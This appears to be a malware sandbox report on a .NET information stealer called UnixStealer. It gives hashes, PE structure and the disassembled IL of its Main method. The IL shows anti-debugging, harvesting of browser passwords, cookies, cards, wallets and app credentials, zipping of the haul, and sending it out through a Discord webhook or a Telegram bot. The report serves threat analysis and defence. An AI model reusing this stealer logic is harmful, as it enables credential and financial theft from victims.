Malicious
Malicious

b3212718f357a61c2bc533bbe0b921d1

PE Executable
|
MD5: b3212718f357a61c2bc533bbe0b921d1
|
Size: 292.88 KB
|
application/x-dosexec

Infection Chain
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Low

Hash
 Hash Value
MD5
b3212718f357a61c2bc533bbe0b921d1
Sha1
9134ea9ce0054ce90106f647b5961eb7e8614b13
Sha256
b6dd020607b6f63182a969b8264941575dc3df0acdb5ca35cf73f30d7edb76b8
Sha384
0bf7b5f565109d2878906180f9a2ed1fdf176c472d2b65f20c9f0d55eb156fe5e60ce89e379fff4bec282217a7e23c7d
Sha512
d135edf1e6e9f857ead6041fe637ee4ec39fa6984a6da3563582d0da88a10345b04c39ee45589f9fe4f5db433c41f0255d65a65c42fa73e11d17a967ac523301
SSDeep
6144:qL59NhegY2f0jaQ5IbymkBTlteQwBKhaGbVO4rbUg4CW:qFh2j7Obw3Lc+aOrbOCW
TLSH
53544B0027ED4A5AF3FF5BB8E0B1116583B1B466F93EDB8E6C4460EE1923740D951BA3

PeID

HQR data file
File Structure
b3212718f357a61c2bc533bbe0b921d1
Malicious
Overlay_fc91c83c.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

Overlay extracted: Overlay_fc91c83c.bin (526 bytes)
Info

PDB Path: C:\Users\brtig\OneDrive\Desktop\Src\UnixStealer\UnixStealer\obj\Release\UnixStealer.pdb
Module Name

UnixStealer.exe
Full Name

UnixStealer.exe
EntryPoint

System.Void UnixStealer.Program::Main(System.String[])
Scope Name

UnixStealer.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

UnixStealer
Assembly Version

1.6.2.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.8
Total Strings

1394
Main Method

System.Void UnixStealer.Program::Main(System.String[])
Main IL Instruction Count

467
Main IL

call System.Void UnixStealer.Stealth::HideConsole() call System.Void UnixStealer.Stealth::PreventClose() call System.Void UnixStealer.Stealth::SetProcessPriority() call System.Void UnixStealer.AntiDebug::CheckDebugger() call System.Void UnixStealer.AntiDebug::StartAntiDebugThread() ldsfld System.String UnixStealer.Help::ExploitDir call System.Boolean System.IO.File::Exists(System.String) brtrue IL_054A: ret call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.String System.Diagnostics.Process::get_ProcessName() call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> conv.i4 <null> ldc.i4.1 <null> bne.un IL_054A: ret ldsfld System.String UnixStealer.Help::ExploitDir call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> newobj System.Void System.Collections.Generic.List`1<System.Threading.Thread>::.ctor() stloc.0 <null> ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_0 dup <null> brtrue.s IL_0070: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_0 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_1 dup <null> brtrue.s IL_009A: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_1() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_1 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_2 dup <null> brtrue.s IL_00C4: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_2() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_2 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_3 dup <null> brtrue.s IL_00EE: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_3() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_3 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_4 dup <null> brtrue.s IL_0118: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_4() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_4 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_5 dup <null> brtrue.s IL_0142: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_5() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_5 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> System.Collections.Generic.List`1<System.Threading.Thread>::GetEnumerator() stloc.s V_7 br.s IL_0162: ldloca.s V_7 ldloca.s V_7 call System.Threading.Thread System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::get_Current() callvirt System.Void System.Threading.Thread::Start() ldloca.s V_7 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::MoveNext() brtrue.s IL_0156: ldloca.s V_7 leave.s IL_017B: ldloc.0 ldloca.s V_7 constrained. System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.0 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> System.Collections.Generic.List`1<System.Threading.Thread>::GetEnumerator() stloc.s V_7 br.s IL_0191: ldloca.s V_7 ldloca.s V_7 call System.Threading.Thread System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::get_Current() callvirt System.Void System.Threading.Thread::Join() ldloca.s V_7 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::MoveNext() brtrue.s IL_0185: ldloca.s V_7 leave.s IL_01AA: ldc.i4.7 ldloca.s V_7 constrained. System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String UnixStealer.Help::ExploitDir stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr \ stelem.ref <null> dup <null> ldc.i4.2 <null> call System.String UnixStealer.SystemInfo::CountryCode() stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String UnixStealer.SystemInfo::IP() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr ( stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String UnixStealer.Help::dateLog stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr ).zip stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.1 <null> ldstr cp866 call System.Text.Encoding System.Text.Encoding::GetEncoding(System.String) newobj System.Void Ionic.Zip.ZipFile::.ctor(System.Text.Encoding) stloc.s V_8 ldloc.s V_8 ldc.i4.m1 <null> conv.i8 <null> callvirt System.Void Ionic.Zip.ZipFile::set_ParallelDeflateThreshold(System.Int64) ldloc.s V_8 ldc.i4.2 <null> callvirt System.Void Ionic.Zip.ZipFile::set_UseZip64WhenSaving(Ionic.Zip.Zip64Option) ldloc.s V_8 ldc.i4.6 <null> callvirt System.Void Ionic.Zip.ZipFile::set_CompressionLevel(Ionic.Zlib.CompressionLevel) ldloc.s V_8 ldstr callvirt System.Void Ionic.Zip.ZipFile::set_Comment(System.String) ldloc.s V_8 ldsfld System.String UnixStealer.Config::zipPass callvirt System.Void Ionic.Zip.ZipFile::set_Password(System.String) ldloc.s V_8 ldsfld System.String UnixStealer.Help::ExploitDir callvirt Ionic.Zip.ZipEntry Ionic.Zip.ZipFile::AddDirectory(System.String) pop <null> ldloc.s V_8 ldloc.1 <null> callvirt System.Void Ionic.Zip.ZipFile::Save(System.String) leave.s IL_0253: ldc.i4.s 32 ldloc.s V_8 brfalse.s IL_0252: endfinally ldloc.s V_8 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.s 32 newarr System.String dup <null> ldc.i4.0 <null> ldstr :spy: NEW LOG FROM - stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_MachineName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String System.Environment::get_UserName() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr :person_in_manual_wheelchair: :eye: IP: stelem.ref <null> dup <null> ldc.i4.5 <null> call System.String UnixStealer.SystemInfo::IP() stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> dup <null> ldc.i4.7 <null> call System.String UnixStealer.SystemInfo::Country() stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr :desktop: stelem.ref <null> dup <null> ldc.i4.s 9 call System.String UnixStealer.SystemInfo::GetSystemVersion() stelem.ref <null> dup <null> ldc.i4.s 10 ldstr ================================ :key: Passwords - stelem.ref <null> dup <null> ldc.i4.s 11 ldsflda System.Int32 UnixStealer.Counting::Passwords call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 12 ldstr :cookie: Cookies - stelem.ref <null> dup <null> ldc.i4.s 13 ldsflda System.Int32 UnixStealer.Counting::Cookies call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 14 ldstr :notepad_spiral: AutoFills - stelem.ref <null> dup <null> ldc.i4.s 15 ldsflda System.Int32 UnixStealer.Counting::AutoFill call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 16 ldstr :credit_card: CC - stelem.ref <null> dup <null> ldc.i4.s 17 ldsflda System.Int32 UnixStealer.Counting::CreditCards call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 18 ldstr :file_folder: Grabbed Files - stelem.ref <null> dup <null> ldc.i4.s 19 ldsflda System.Int32 UnixStealer.Counting::FileGrabber call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 20 ldstr ================================ GRABBED SOFTWARE: stelem.ref <null> dup <null> ldc.i4.s 21 ldsfld System.Int32 UnixStealer.Counting::Discord ldc.i4.0 <null> bgt.s IL_0339: ldstr "\n Discord" ldstr br.s IL_033E: stelem.ref ldstr Discord stelem.ref <null> dup <null> ldc.i4.s 22 ldsfld System.Int32 UnixStealer.Counting::Wallets ldc.i4.0 <null> bgt.s IL_0351: ldstr "\n Wallets" ldstr br.s IL_0356: stelem.ref ldstr Wallets stelem.ref <null> dup <null> ldc.i4.s 23 ldsfld System.Int32 UnixStealer.Counting::Telegram ldc.i4.0 <null> bgt.s IL_0369: ldstr "\n Telegram" ldstr br.s IL_036E: stelem.ref ldstr Telegram stelem.ref <null> dup <null> ldc.i4.s 24 ldsfld System.Int32 UnixStealer.Counting::FileZilla ldc.i4.0 <null> bgt.s IL_0381: ldstr "\n FileZilla (" ldstr br.s IL_039A: stelem.ref ldstr FileZilla ( ldsflda System.Int32 UnixStealer.Counting::FileZilla call System.String System.Int32::ToString() ldstr ) call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.s 25 ldsfld System.Int32 UnixStealer.Counting::Steam ldc.i4.0 <null> bgt.s IL_03AD: ldstr "\n Steam" ldstr br.s IL_03B2: stelem.ref ldstr Steam stelem.ref <null> dup <null> ldc.i4.s 26 ldsfld System.Int32 UnixStealer.Counting::NordVPN ldc.i4.0 <null> bgt.s IL_03C5: ldstr "\n NordVPN" ldstr br.s IL_03CA: stelem.ref ldstr NordVPN stelem.ref <null> dup <null> ldc.i4.s 27 ldsfld System.Int32 UnixStealer.Counting::OpenVPN ldc.i4.0 <null> bgt.s IL_03DD: ldstr "\n OpenVPN" ldstr br.s IL_03E2: stelem.ref ldstr OpenVPN stelem.ref <null> dup <null> ldc.i4.s 28 ldsfld System.Int32 UnixStealer.Counting::ProtonVPN ldc.i4.0 <null> bgt.s IL_03F5: ldstr "\n ProtonVPN" ldstr br.s IL_03FA: stelem.ref ldstr ProtonVPN stelem.ref <null> dup <null> ldc.i4.s 29 ldsfld System.Int32 UnixStealer.Counting::VimeWorld ldc.i4.0 <null> bgt.s IL_040D: ldstr "\n VimeWorld" ldstr br.s IL_0460: stelem.ref ldstr VimeWorld ldsfld System.Boolean UnixStealer.Config::VimeWorld brtrue.s IL_0420: ldc.i4.6 ldstr br.s IL_045B: call System.String System.String::Concat(System.String,System.String) ldc.i4.6 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr : NickName - stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String UnixStealer.VimeWorld::NickName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr : Donate - stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String UnixStealer.VimeWorld::Donate() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : Level - stelem.ref <null> dup <null> ldc.i4.5 <null> call System.String UnixStealer.VimeWorld::Level() stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.s 30 ldstr ================================ DOMAINS DETECTED: - stelem.ref <null> dup <null> ldc.i4.s 31 ldsfld System.String UnixStealer.Help::ExploitDir ldstr \Browsers\ call System.String System.String::Concat(System.String,System.String) call System.String UnixStealer.URLSearcher::GetDomainDetect(System.String) stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.2 <null> call System.String System.Environment::get_MachineName() ldstr . call System.String System.Environment::get_UserName() ldstr .zip call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.3 <null> ldstr zip stloc.s V_4 ldloc.1 <null> stloc.s V_5 ldstr stloc.s V_6 ldsfld System.String UnixStealer.Config::discordWebhook call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_04CD: ldsfld System.String UnixStealer.Config::telegramBotToken ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 ldloc.s V_5 ldloc.s V_6 call System.String DiscordWebhook::SendFile(System.String,System.String,System.String,System.String,System.String) pop <null> ldsfld System.String UnixStealer.Config::telegramBotToken call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_04F7: leave.s IL_053C ldsfld System.String UnixStealer.Config::telegramChatId call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_04F7: leave.s IL_053C ldloc.2 <null> call System.Void UnixStealer.Telegram::SendMessage(System.String) ldloc.s V_5 ldstr Unix Stealer Log call System.Void UnixStealer.Telegram::SendFile(System.String,System.String) leave.s IL_053C: call System.Void UnixStealer.Program::Finish() pop <null> ldsfld System.String UnixStealer.Config::telegramBotToken call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_051E: ldsfld System.String UnixStealer.Config::discordWebhook ldsfld System.String UnixStealer.Config::telegramChatId call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_051E: ldsfld System.String UnixStealer.Config::discordWebhook ldstr Log size is more then 8 MB. Sending isn`t available. call System.Void UnixStealer.Telegram::SendMessage(System.String) br.s IL_0535: leave.s IL_053A ldsfld System.String UnixStealer.Config::discordWebhook call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0535: leave.s IL_053A ldstr Log size is more then 8 MB. Sending isn`t available. call System.String DiscordWebhook::Send(System.String) pop <null> leave.s IL_053A: leave.s IL_053C pop <null> leave.s IL_053A: leave.s IL_053C leave.s IL_053C: call System.Void UnixStealer.Program::Finish() call System.Void UnixStealer.Program::Finish() leave.s IL_054A: ret call System.Void System.Console::WriteLine(System.Object) leave.s IL_054A: ret ret <null>
b3212718f357a61c2bc533bbe0b921d1 (292.88 KB)
File Structure
b3212718f357a61c2bc533bbe0b921d1
Malicious
Overlay_fc91c83c.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙